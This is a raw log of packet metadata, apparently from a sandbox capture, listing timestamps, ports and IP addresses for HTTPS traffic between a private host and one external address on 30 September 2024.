Sep 30, 2024 18:20:10.595103025 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:10.595130920 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.595163107 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.605273008 CEST	49711	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:10.605292082 CEST	443	49711	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:13.143702984 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:13.143754005 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:13.143815041 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:13.663391113 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:13.663414001 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.131722927 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.131795883 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.132951021 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.132965088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.133250952 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.135206938 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.179400921 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301584005 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301624060 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301650047 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301673889 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.301676989 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301688910 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301728010 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.301737070 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.301784039 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.302052975 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.302094936 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.302105904 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.302128077 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.302164078 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.302170038 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373111010 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373145103 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373169899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373191118 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.373197079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373226881 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373229027 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.373260021 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373272896 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.373281956 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.373321056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.373955965 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.390748024 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.390789986 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.390835047 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.390844107 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.390853882 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.390901089 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.390911102 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.391864061 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.391891003 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.391911030 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.391918898 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.391923904 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.391949892 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.392047882 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.392546892 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.392574072 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.392590046 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.392596006 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.392625093 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.392961025 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.393003941 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.393008947 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.393964052 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.394886971 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.394895077 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.461803913 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.461833000 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.461854935 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.461900949 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.461913109 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.461951971 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.462155104 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.462162971 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.462209940 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.462217093 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.463483095 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.463541985 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.463548899 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.463593006 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.479010105 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.479026079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.479094982 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.479204893 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.479252100 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.479264975 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.479274988 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.479300022 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.479315042 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.480106115 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.480155945 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.480756044 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.480807066 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.480853081 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.480901003 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.481652975 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.481697083 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.481755972 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.481803894 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.482631922 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.482705116 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.483434916 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.483494043 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.483562946 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.483613968 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.550302029 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.550378084 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.550384045 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.550406933 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.550436974 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.550451994 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.550607920 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.550656080 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.551130056 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.551176071 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.567347050 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.567445040 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.567445993 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.567456007 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.567490101 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.567512989 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.567557096 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.568306923 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.568350077 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.568355083 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.568399906 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.568825960 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.568876028 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.568928957 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.568965912 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.569127083 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.569169998 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.569691896 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.569736004 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.569809914 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.569856882 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.569997072 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.570044994 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.570597887 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.570641041 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.570710897 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.570756912 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.571433067 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.571482897 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.571582079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.571629047 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.571676970 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.571722031 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.572350025 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.572390079 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.572453022 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.572499037 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.572504044 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.572513103 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.572547913 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.573229074 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.573285103 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.573332071 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.573373079 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.574088097 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.574132919 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.638827085 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.638843060 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.638879061 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.638914108 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.638925076 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.638951063 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.639308929 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.639324903 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.639360905 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.639367104 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.639396906 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.656124115 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.656147957 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.656229973 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.656236887 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657298088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657320023 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657377958 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.657387972 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657402992 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657443047 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.657448053 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657485962 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657505035 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.657511950 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.657556057 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.661569118 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661592960 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661670923 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.661678076 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661830902 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661849976 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661885023 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.661890030 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.661915064 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.661935091 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.727458954 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.727480888 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.727529049 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.727535963 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.727559090 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.727580070 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.728020906 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.728037119 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.728091955 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.728097916 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.728117943 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.728131056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.744949102 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.744967937 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745019913 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745033026 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745059013 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745078087 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745243073 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745259047 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745290995 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745297909 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745326042 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745335102 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745765924 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745780945 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745831966 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745837927 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.745858908 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.745873928 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.746217012 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.746231079 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.746273994 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.746279955 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.746300936 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.746318102 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.746656895 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.746670961 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.746841908 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.746846914 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.747046947 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.747159004 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.747173071 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.747215033 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.747220993 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.747245073 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.747255087 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.816145897 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816164970 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816214085 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.816231012 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816270113 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.816545963 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816560030 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816617012 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.816628933 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.816761017 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.833317041 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833333969 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833415985 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.833430052 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833468914 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.833645105 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833659887 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833697081 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.833704948 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.833734989 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.833750010 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.834264040 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834278107 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834333897 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.834342003 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834491968 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.834656954 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834671974 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834717989 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.834724903 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.834961891 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835129976 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835144997 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835182905 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835190058 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835215092 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835232973 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835417986 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835436106 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835475922 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835483074 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.835503101 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.835524082 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.905199051 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905236959 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905330896 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.905344963 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905383110 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.905431032 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905446053 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905499935 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.905507088 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.905559063 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.923697948 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.923722982 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.923799992 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.923815012 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.923891068 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.923902988 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.923953056 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.923957109 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.923971891 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.924005985 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.924017906 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.924561977 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.924588919 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.924638987 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.924649000 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.924674034 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.924680948 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.925107956 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.925127983 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.925168037 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.925175905 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.925187111 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.925277948 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.925993919 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.926040888 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.926059008 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.926065922 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.926116943 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.926116943 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.926390886 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.926414967 CEST	443	49714	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:14.926449060 CEST	49714	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:14.926455021 CEST	443	49714	188.114.97.3	192.168.2.10
